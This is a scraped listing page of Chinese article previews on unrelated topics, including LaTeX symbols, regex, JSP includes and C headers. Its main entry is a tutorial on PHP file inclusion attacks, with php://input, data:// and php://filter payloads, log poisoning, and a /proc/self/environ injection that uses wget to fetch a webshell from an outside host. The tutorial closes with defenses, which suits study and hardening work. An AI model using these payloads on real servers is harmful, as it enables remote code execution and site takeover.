精华内容
下载资源
问答
  •  今天输入数学符号,竟然找不到 包含符号 ,找了很久,终于找到解决办法,word 2003都可以。 <br /> 打开Word,点击“插入”,再选其中的“域”,在左边的“域名”列表中找到“Eq ”,点一下,再点右边...

       今天输入数学符号,竟然找不到 包含符号 ,找了很久,终于找到解决办法,word 2003都可以。

        打开Word,点击“插入”,再选其中的“域”,在左边的“域名”列表中找到“Eq ”,点一下,再点右边的“公式编辑器”,之后在出现的“公式”工具栏 内找到有一个“集合论符号”(上面一排左起第七个),所有的集合符号里面都有,方便吧

    展开全文
  • 真包含 \subset \begin{equation}\subset\end{equation} 包含 \subseteq \begin{equation}\subseteq\end{equation} \supset \begin{equation}\supset\end{equation} \in \begin{equation}\in\end{equation...

    一些特殊的集合符号,使用 \mathbb 命令:

     

    \mathbb{R} 或 \mathbb R:     \begin{equation}\mathbb R\end{equation}

    \mathbb{z}:      \begin{equation}\mathbb{Z}\end{equation}

    \mathbb{N}:     \begin{equation}\mathbb{N}\end{equation}

     

    集合的相关操作:

     

     

    真包含 \subset     \begin{equation}\subset\end{equation}

    包含 \subseteq  \begin{equation}\subseteq\end{equation}

    \supset     \begin{equation}\supset\end{equation}

    \in            \begin{equation}\in\end{equation}

    \cap         \begin{equation}\cap\end{equation}

    \cup         \begin{equation}\cup\end{equation}

    \mid         \begin{equation}\mid\end{equation}

    \notin       \begin{equation}\notin\end{equation}

     

    展开全文
  • 文件包含

    千次阅读 2018-01-12 09:28:47
    文件包含原理 文件包含 开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含 文件包含漏洞 开发人员为了使代码更灵活,会将被包含的文件设置...

    文件包含原理

    1. 文件包含
      开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含
    2. 文件包含漏洞
      开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞

    文件包含分类

    1. 本地文件包含
      包含服务器本身存在的恶意文件
      a.txt

      <?php phpinfo();?>

      b.php

      <?php
      $b=$_GET['id'];
      include($b);
      ?>

      payload:

      localhost/b.php?id=a.txt //返回phpinfo页面

      注:

      • 两个文件在同一目录下(若不在同一目录这被包含的文件路径必须写绝对路径或相对路径)
      • 被包含的页面的后缀无论是什么都会当做PHP解析
    2. 远程文件包含
      包含其他网站上的恶意文件
      远程文件包含利用条件:

      • 在php.ini中allow_url_fopen=on、allow_url_include=on

      payload:

      localhost/b.php?id=http://ip/文件路径

      注:

      • 远程包含的文件路径必须是绝对路径

    存在文件包含的脚本语言及应用函数

    • php
    include():执行到include函数时才文件包含,找不到被包含的文件路径时,发出警告,脚本继续运行
    require():只要程序一运行就进行文件包含,找不到被包含的文件路径时,产生致命错误,脚本停止运行
    include_once()与require():与上述函数一样,只是若文件中代码已经被包含则不会再次包含
    • jsp/servlet
    ava.io.file()
    java.io.filereader()
    • asp
    include file
    include virtual

    各个协议实现命令执行

    • %00截断
    是否需要截断是根据包含函数后有没有对包含的文件进行拼接一个后缀,如果有就需要使用%00进行截断
    当php版本<=5.2使用%00截断
    • file://:用于访问本地文件系统
    条件(php.ini):
        allow_url_fopen   off/on
        allow_url_include off/on
    使用方法:file://[文件的绝对路径和文件名]
    • php://:访问各个输入输出流
    php伪协议:
        php://filter:用于读取源码并进行bash64编码输出;
        条件(php.ini):
            allow_url_fope   off/on
            allow_url_include off/on
        php://input:可以访问请求的原始数据的只读流,将post请求中的数据作为PHP代码执行;
        条件(php.ini):
            allow_url_fope   off/on
            allow_url_include on
        php://stdin是只读的,php://stdout 和 php://stderr 是只写的。
        php://output 是一个只写的数据流, 允许你以 print 和 echo 一样的方式 写入到输出缓冲区。
        php://fd 允许直接访问指定的文件描述符。
    • zip://,bzip://,zlib://:均属于压缩流,可以访问压缩文件中的子文件,不需要传后缀名
    条件:
        allow_url_fope   off/on
        allow_url_include off/on
    zip://使用方法:
        zip://[压缩文件绝对路径]#[压缩文件内的子文件名]
    bzip2://使用方法:
        bzip2://file.bz2
    zlib://使用方法:
        zlib://file.gz
    • data://
    条件:
        allow_url_fope   on
        allow_url_include on

    这里写图片描述

    • phar://:数据流包装器

    文件包含利用场景

    • 包含上传文件
    用户上传了一个可执行文件,通过文件包含那个文件实现漏洞利用
    防御:
        做好上传限制
        隐藏好文件路径
        设置访问权限、执行权限
    • 伪协议
    php://input:用来接收POST数据。我们能够通过input把我们的语句输入上去然后执行。
    条件:
        php <5.0 ,allow_url_include=Off 情况下也可以用
        php > 5.0,只有在allow_url_fopen=On 时才能使用
    例:
        http://localhost/include/file.php?file=php://input     //URL
        <?php fputs(fopen("a.php","w"),"<?php phpinfo();?>")?>  //POST,创建一个文件a.php;并写入phpinfo
    data://:将原本的include的文件流重定向到了用户可控制的输入流中
    条件:
        allow_url_include=On
        php > 5.2
    例:
        http://localhost/file.php?file=data:text/plain;base64,PD9waHAgc3lzdGVtKHdob2FtaSk/Pg==      //base64加密<?php system(whoami);?>;直接执行命令
        http://localhost/image.php?imagedata=data://image/jpeg;base64,..... // 后面加上图片木马;图片命令执行
    php://filter:这个语句用来查看源码。直接包含php文件时会被解析,不能看到源码,所以用filter来读取,不过要先base64加密传输过
    例:
        http://localhost/file.php?file=php://filter/read=convert.base64-encode/resource=C:\oneword    //可以跟绝对路径也可以跟相对路径
        http://localhost/file.php?file=php://filter/read=convert.base64-encode/resource=[http|https|ftp]://www.bbb.com/2.txt   //远程路径
    防御:
        尽量使用安全版本的php
        做好php的安全配置
        对相应目录做相应权限设置
    • 包含日志文件
    1、日志的默认路径
        /etc/httpd/logs/access_log或/var/log/httpd/access_log        //apache+linux
        D:xamppapachelogsaccess.log或D:xamppapachelogserror.log  //apache_win2003
        C:WINDOWSsystem32Logfiles                     //iis6.0+win2003
        %SystemDrive%inetpublogsLogFiles            //iis7.0+win2003
        nginx 日志文件在用户安装目录的logs目录下
    2、web中间件默认配置uoh文件
        /etc/httpd/conf/httpd.conf或index.php?page=/etc/init.d/httpd        //apache+linux
        C:/Windows/system32/inetsrv/metabase.xml          //iis6.0+win2003
        C:WindowsSystem32inetsrvconfigapplicationHost.config           //iis7.0+win
    3、利用
        访问http://www.xx.com/<?php phpinfo(); ?>时,<?php phpinfo(); ?>也会被记录在日志里,也可以插入到User-Agent;但是在日志里这句话被编码了;所以用Burp Suite修改来绕过编码;然后包含相应的日志文件:
        http://localhost/include/file.php?file=../../apache/logs/access.log //(这里利用相对路径,找到日志文件,并以php解析的方式打开)
    4、防御
        隐藏或修改默认日志文件
        设置日志文件读取权限
    • 包含/proc/self/environ
    1、找文件包含漏洞
        www.aaa.com/view.php?page=../
        www.aaa.com/view.php?page=../../../../../etc/passwd
    2、检查proc/self/environ是否可以访问
        www.aaa.com/view.php?page=../../../../../proc/self/environ
    3、如果可读就注入代码
        访问:www.aaa.com/view.php?page=../../../../../proc/self/environ
        选择User-Agent 写代码如下:<?system('wget http://www.yourweb.com/oneword.txt -O shell.php');?>    //提交请求;我们的命令将被执行(将下载http://www.yourweb.com/oneword.txt,并将其保存为它在shell.php网站目录),我们的shell也就被创建,.如果不行,尝试使用exec(),因为系统可能被禁用的从php.ini网络服务器.
    4、访问shell
    5、防御:
        设置proc/self/environ不可访问
    • 包含Session文件
    ?file=../../../../../../tmp/sess_1sv3pu01f97dp3qcfef8i2b9r2         //读取session文件

    常见的绕过与防御

    • %00截断(php<5.3.4)
    说明:
        PHP内核是由C语言实现的,因此使用了C语言中的一些字符串处理函数。在连接字符串时,0字节(x00)将作为字符串的结束符。所以在这个地方,攻击者只要在最后加入一个0字节,就能截断file变量之后的字符串。
    防御:
        禁用0字节
    • 超长字符截断
    利用:
        利用操作系统对目录最大长度的限制,可以不需要0字节而达到截断的目的。
        我们知道目录字符串,在window256字节、linux下4096字节时会达到最大值,最大值长度之后的字符将被丢弃。
        而利用"./"的方式即可构造出超长目录字符串
    防御:
        限制用户输入字符长度
    • 任意目录遍历
    利用:
        使用"../../../"这样的方式来返回到上层目录中,这种方式又被称为"目录遍历(Path Traversal)"。常见的目录遍历漏洞,还可以通过不同的编码方式来绕过一些服务器端的防御逻辑(WAF)
    防御:
        目录遍历漏洞是一种跨越目录读取文件的方法,但当PHP配置了open_basedir时,将很好地保护服务器,使得这种攻击无效。
        open_basedir的作用是限制在某个特定目录下PHP能打开的文件(有点像chroot的感觉)
    • 问号截断
    利用:
        http://localhost/FIleInclude/index.php?path=http://localhost/test/solution.php?
    防御:
        关闭远程文件包含的配置选项allow_url_include = Off

    防御总结

    1、无需情况下设置allow_url_include和allow_url_fopen为关闭
    2、对可以包含的文件进行限制,可以使用白名单的方式,或者设置可以包含的目录,如open_basedir
    3、尽量不使用动态包含
    4、严格检查变量是否已经初始化。
    5、建议假定所有输入都是可疑的,尝试对所有输入提交可能可能包含的文件地址,包括服务器本地文件及远程文件,进行严格的检查,参数中不允许出现../之类的目录跳转符。
    6、严格检查include类的文件包含函数中的参数是否外界可控。
    7、不要仅仅在客户端做数据的验证与过滤,关键的过滤步骤在服务端进行。
    8、在发布应用程序之前测试所有已知的威胁。
    展开全文
  • 1,包含a和b: ^(?=.*a)(?=.*b).*$ 2,包含a不包含b: ^((?!b.)*a((?!b).)*$ 例:包含admin且不包含abc。 ^((?!abc).)*admin((?!abc).)*$ 3,包含a不包含b和c: ^((?!b|c).)...

    1,包含a和b:

                            ^(?=.*a)(?=.*b).*$

    补充,如果多行里面有a和b那么就是下面表达式,因为.只是正则中除了\n的任意字符,想要匹配任意字符需要(.|\n)

    ^(?=(.|\n)*a)(?=(.|\n)*b)(.|\n)*$

    2,包含a不包含b:

                            ^((?!b.)*a((?!b).)*$

                           例:包含admin且不包含abc。

                          ^((?!abc).)*admin((?!abc).)*$

    3,包含a不包含b和c:

                            ^((?!b|c).)*a((?!b|c).)*$

     

    (?!abc) 的意思是,不匹配abc,但是并不占用小括号()的捕捉位置

    那么((?!abc).)*  的意思就是匹配  不含abc的字符(?!abc) 跟 任意字符. 的组合,出现任何次* 

    ((?!abc).)* 的结果就是 匹配了不包含abc的字符串

    加上首尾  ^((?!abc).)*$ 表示匹配一行

    效果如下

     

    展开全文
  • 【文件包含】文件包含漏洞知识总结

    千次阅读 多人点赞 2019-06-28 08:38:41
    【文件包含】文件包含漏洞知识总结 Hello,各位小伙伴周五好~ 这里是你们的劳模小编~ 之前一期,我们已经一起总结了文件上传和文件解析漏洞。 今天我们就一起来看看文件包含漏洞吧~ 一、什么是文件包含漏洞? 1、...
  • 只是解决头文件重复包含的问题的,但是头文件嵌套包含,就不代表不会出问题,就会关系错综复杂,出现标识符未定义,重定义等错误。(具体的错误和举例,自己百度搜索吧) 所以C语言头文件包含原则如下:(头文件...
  • php本地文件包含&远程文件包含

    千次阅读 2016-04-07 12:49:04
    本地文件包含&远程文件包含
  • 包含

    千次阅读 2017-09-16 16:39:16
    包含是指在组件重用时不需要包含其他的可重用组件。 例如Web Service就是自包含组件,即它不需要依赖其他组件。 Web Services自包含模块化的应用程序,也就是说它本身含有,不需要依赖其他程序. 再例: 对头文件...
  • 静态包含和动态包含的区别

    千次阅读 多人点赞 2018-05-26 23:03:11
    2)参数传递不同静态包含不能向被包含页面传递参数动态包含可以使用jsp:param标签向被包含页面传递参数3)原理不同静态包含: 先合并再翻译动态包含: 先翻译再合并1.静态包含是在转换之前把包含的文件合在一起,...
  • JSP中静态包含和动态包含的区别?

    千次阅读 2016-04-23 16:01:43
    主要从以下5方面进行分析: 1.语法: 静态包含: ...4.静态包含是先将文件中内容导入被包含的文件中,再一起编译,最后再展现给用户(先包含再编译) 5.动态包含可以自动区分被包含文件是静态的还
  • JSP中的静态包含和动态包含

    千次阅读 热门讨论 2013-09-11 10:56:45
    接触过asp.net的都知道它里面有母版这么一种东东,而jsp又跟asp如此相似,那么jsp中也应该有类似的东西,它就是包含。JSP中有两种包含:静态包含: file="被包含页面"%>和动态包含:。下面以一个例子来说明如何使用...
  • 求 只包含 ‘低’ 的 num 结果应该是 4 8
  • Shell 文件包含

    千次阅读 2016-08-31 21:47:22
    概述和其他语言一样,Shell 也可以包含外部脚本。这样可以很方便的封装一些公用的代码作为一个独立的文件。语法Shell 文件包含的语法格式如下:. filename # 注意点号(.)和文件名中间有一空格或source filename栗子...
  • 文件包含漏洞

    千次阅读 2016-07-27 11:13:05
    文件包含漏洞0x01 产生原因在通过引入文件时,引用的文件名,用户可控,由于传入的文件名没有经过合理的校验,或者校验被绕过,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入分类 ...
  • 静态包含是通过JSP的include指令包含页面,动态包含是通过JSP标准动作&lt;jsp:include&gt;包含页面。 静态包含是编译时包含,如果包含的页面不存在则会产生编译错误,而且两个页面的"contentType"...
  • MongoDB 模糊查询包含/不包含字符串

    千次阅读 2019-10-24 15:50:22
    MongoTemplate模糊查询,spring ...模糊查询 不包含content 的记录 String content = "192.168.1.2"; Pattern compile = Pattern.compile("^((?!" + content+ ").)*$", Pattern.CASE_INSENSITIVE); Query query ...
  • 这篇文章主要介绍了JSP页面的动态包含和静态包含示例及介绍,本文讲解了它们的区别并给出了相应例子,需要的朋友可以参考下 一、静态包含 本文介绍JSP静态包含语句,即使用JSP的include指令来完成的包含操作。 ...
  • 测试Jsp 静态包含和动态包含

    千次阅读 2013-03-10 20:05:19
    静态包含是在请求包含页面时去编译包含页面,编译时遇到静态页面包含伪码将被包含页面的内容复制到被包含页面中进行编译。 动态包含是指在请求包含页面的时候遇到动态包含指令将请求转到被包含页面,这时去编译被...
  • js 包含

    千次阅读 2019-09-03 12:44:16
    字符串的包含 var str = "北方天气好"; console.log(str.indexOf("北") != -1 ); // true indexOf() 方法可返回某个指定的字符串值在字符串中首次出现的位置。如果要检索的字符串值没有出现,则该方法返回 -1...
  • c/c++, 附加库目录,代表的是c/c++文件编译时所需要的头文件,而资源编译时也是需要附加包含库目录的, 而vc++的包含目录,代表的是全局项目的包含目录 配置过VC++里面的库,C/C++里面的就可以不用配置...
  • CSS-包含

    千次阅读 2018-05-20 10:57:15
    包含块:是视觉格式化模型的一个重要概念,它与盒模型类似,也可以理解为一个矩形,而这个矩形的作用是为它里面包含的元素提供一个参考,元素的尺寸和位置的计算往往是由该元素所在的包含块决定的。可以把包含块理解...
  • 在代码开发的过程中,常常碰到编译、链接、运行时加载dll 的问题,简单罗列一下: 1. 未包含头文件:  报错信息可能为: 编译错误 ...3. 包含头文件,包含lib库,编译成功,运行时,dll不在当前路径或包含路径(通常
  • 正则表达式匹配:包含且不包含

    万次阅读 2016-10-11 18:05:08
    参考:http://www.jb51.net/article/52491.htm http://www.cnblogs.com/yirlin/archive/2006/04/12/373222.html例:包含admin且不包含abc。 ^((?!abc).)*$ 查资料知道:(?!pattern) 负向预查,在任何不匹配 ...
  • jsp中静态包含 vs 动态包含的区别?

    千次阅读 2017-07-27 16:39:50
    静态包含语法: 动态包含语法:  2)参数传递不同 静态包含不能向被包含页面传递参数 动态包含可以向被包含页面传递参数 3)原理不同 静态包含: 先合并再翻译 动态包含: 先翻译再合并
  • mysql 搜索条件包含与被包含

    千次阅读 2014-02-27 14:51:30
    包含 a like ‘%b%’ 被包含 instr(b,a)>0
  • C文件包含.h文件和包含.c文件总结

    千次阅读 2014-07-31 22:18:06
     很多人对C语言中的 “文件包含”都不陌生了,文件包含处理在程序开发中会给我们的模块化程序设计带来很大的好处,通过文件包含的方法把程序中的各个功能模块联系起来是模块化程序设计中的一种非常有利的手段。...
  • 文件包含漏洞概述 1.定义:文件包含漏洞是一种最常见的漏洞类型,它会影响依赖于脚本运行时的web应用程序。当应用程序使用攻击者控制的变量构建可执行代码的路径时,文件包含漏洞会导致攻击者任意控制运行时执行的...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 7,295,840
精华内容 2,918,336
关键字:

包含真包含